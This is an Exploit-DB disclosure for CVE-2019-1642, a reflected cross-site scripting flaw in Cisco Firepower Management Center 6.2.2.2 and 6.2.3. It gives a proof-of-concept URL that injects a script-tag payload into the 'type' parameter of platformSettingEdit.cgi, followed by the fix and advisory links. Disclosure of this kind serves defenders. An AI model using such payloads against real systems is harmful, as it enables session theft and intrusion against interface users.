Cisco Firepower Management Center 6.2.2.2 / 6.2.3 – Cross-Site Scripting

  • 作者: Bhushan B. Patil
    日期: 2019-01-28
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/46263/
  • # Exploit Title: Cisco Firepower Management Center Cross-Site Scripting (XSS) Vulnerability
    # Google Dork: N/A
    # Date: 23-01-2019
    ################################
    # Exploit Author: Bhushan B. Patil
    ################################
    # Advisory URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-frpwr-mc-xss
    # Affected Version: 6.2.2.2 & 6.2.3
    # Cisco Bug ID: CSCvk30983
    # CVE: CVE-2019-1642
    
    1. Technical Description:
    A vulnerability in the web-based management interface of Cisco Firepower Management Center (FMC) software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of the affected software.
    The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of the affected software. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.
    
    2. Proof Of Concept:
    Login to Cisco Firepower Management Center (FMC) and browse to Systems -> Configuration menu.
    https://<ip address>/platinum/platformSettingEdit.cgi?type=TimeSetting
    
    Append the following XSS payload >"><script>alert("XXS POC")</script>& in the URL
    
    The URL will become and on submitting it you'll get an alert popup.
    https://<ip address>/platinum/platformSettingEdit.cgi?type=>"><script>alert("XXS POC")</script>&
    
    3. Solution:
    Upgrade to version 6.3.0
    For more information about fixed software releases, consult the Cisco bug ID CSCvk30983<https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvk30983>
    
    4. Reference:
    https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-frpwr-mc-xss